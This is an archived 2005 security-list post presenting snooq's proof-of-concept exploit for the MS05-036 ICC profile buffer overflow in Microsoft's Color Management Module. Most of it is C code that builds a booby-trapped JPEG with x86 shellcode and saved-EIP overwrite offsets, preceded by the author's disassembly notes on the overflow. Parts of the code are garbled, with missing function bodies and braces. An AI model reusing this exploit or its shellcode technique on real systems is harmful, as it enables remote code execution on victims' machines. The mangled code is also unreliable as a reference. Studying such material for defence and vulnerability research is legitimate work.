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Monday, July 25, 2005

[EXPL] Microsoft Color Management Buffer Overflow (MS05-036, Exploit)

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Microsoft Color Management Buffer Overflow (MS05-036, Exploit)


The Microsoft Color Management Module allows the operating system to
provide consistent color mappings between different devices and
applications. In addition, this module is used to transform colors from
one color space to another (for example, RGB to CMYK). For additional
information about color management, visit the following
<> Web site.

A remote code execution vulnerability exists in the Microsoft Color
Management Module because of the way that it handles ICC profile format
tag validation, the following exploit code can be used to determine
whether your system is vulnerable to attack or not.


* Author: snooq []
* Date: 21 July 2005
* When I looked at the PoC posted on bugtraq....
* I was basically quite disappointed. The 'PoC' fixed
* 'tag count' to a large number.. but this code path
* does not seem to be exploitable... GetColorProfileElement
* crashes becoz it hits the page boundary while enumerating
* the tags...this simply triggers 'Access Violation' before
* we even overwrite anything in the memory...
* well.. at least that is what I see in SoftICE... tell me if
* it's wrong...
* anyway.. I decided to dig deeper...and I was lucky enuff
* to uncover a more promising path...
* by controlling the size field of 'redMatrixColumnTag'...
* we are able to trick 'GetColorProfileElement' to overwrite
* the stack content...
* the offending code looks like this:
* .text:73B32144 mov esi, eax
* .text:73B32146 mov eax, ecx
* .text:73B32148 shr ecx, 2
* .text:73B3214B rep movsd
* .text:73B3214D mov ecx, eax
* .text:73B3214F and ecx, 3
* .text:73B32152 rep movsb
* .text:73B32154 mov ecx, [ebp+lp]
* .text:73B32157 mov [ecx], eax
* ESI points to 'redMatrixColumnTag' data
* EDI points to a buffer on the stack
* ECX is what we can control (the size field)
* At 73B3214B, it will overflow to the adjacent stack frames
* if ECX is large enuff. As a result, we are able to overwrite
* the saved EIP value of icm32.671123E7...
* the onli prob now.. is I hav not found a reliable
* 'jmp' address... or perhaps.. try SEH trick instead??
* please tell me about it if u have a more reliable way of
* exploiting this... while I am heading to my bed now.
* nonethelss.. this should be good enuff to reproduce the
* bug.. enjoy!
* Greetz:
* =======
* - sk, ck, eugene, nam, jeff, ken, andre, sugi..etc
* - julian and chris from thinkSECURE

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

#define TARGET 1
#define NOP 0x90
#define FNAME "snooq.jpg"
#define BSIZE sizeof(buff)-1
#define EIP_OFFSET 0x336
#define SC_OFFSET 0x246
#define NOP_OFFSET 0x218
#define NOP_SIZE 0x112

* Silly JPEG stuffed with ICC profile.........


struct {
char *os;
long jmpADD;

targets[] = {
"Window XP (en) SP1",
0x04efff00 // this jumps to shellcode
"Dummy (crash all)",
0x43434343 // this jumps to shellcode
}, v;

* Harmless payload that spawns 'notepad.exe'... =p

char shellcode[]=
"\x55" // push ebp
"\x8b\xec" // mov ebp, esp
"\x33\xf6" // xor esi, esi
"\x56" // push esi
"\x68\x2e\x65\x78\x65" // push 'exe.'
"\x68\x65\x70\x61\x64" // push 'dape'
"\x68\x90\x6e\x6f\x74" // push 'ton'
"\x46" // inc esi
"\x56" // push esi
"\x8d\x7d\xf1" // lea edi, [ebp-0xf]
"\x57" // push edi
"\xb8XXXX" // mov eax, XXXX -> WinExec()
"\xff\xd0" // call eax
"\x4e" // dec esi
"\x56" // push esi
"\xb8YYYY" // mov eax, YYYY -> ExitProcess()
"\xff\xd0"; // call eax

unsigned char b[4];

void get_bytes(long word) {

void err_exit(char *s)

void filladdr()
char *ptr;
int i=0;

long addr1=(long)WinExec;
long addr2=(long)ExitProcess;

printf("-> WinExec() is at: 0x%08x\n",addr1);
printf("-> ExitProcess() is at: 0x%08x\n",addr2);


while (*ptr!='\0') {
if (*((long *)ptr)==0x58585858) {
printf("-> Filling in WinExec at offset: %d\n",(ptr-shellcode));
*((long *)ptr)=addr1;
if (*((long *)ptr)==0x59595959) {
printf("-> Filling in ExitProcess at offset: %d\n",(ptr-shellcode));
*((long *)ptr)=addr2;



void buildfile()
int i=0;
FILE *fd;

if ((fd=fopen(FNAME,"wb"))==NULL) {
err_exit("-> Failed to generate file...");

for(;i<BSIZE;i++) {


printf("-> '%s' generated. (%d bytes)\n",FNAME,i);


void fillshellcode()
char *ptr;



while (*ptr!='\0') {
get_bytes(*((long *)(ptr)));


int main(int argc, char *argv[])
int i=0, t=TARGET;

if (argc==2) { t=atoi(argv[1]); }


printf("\nICC Overflow PoC, By Snooq []\n\n");

printf("-> Generating 'jpg' file for target #%d...\n",t);


return 0;



The original advisory can be found at:
<> Vulnerability
in Microsoft Color Management Module Could Allow Remote Code Execution
The information has been provided by <>


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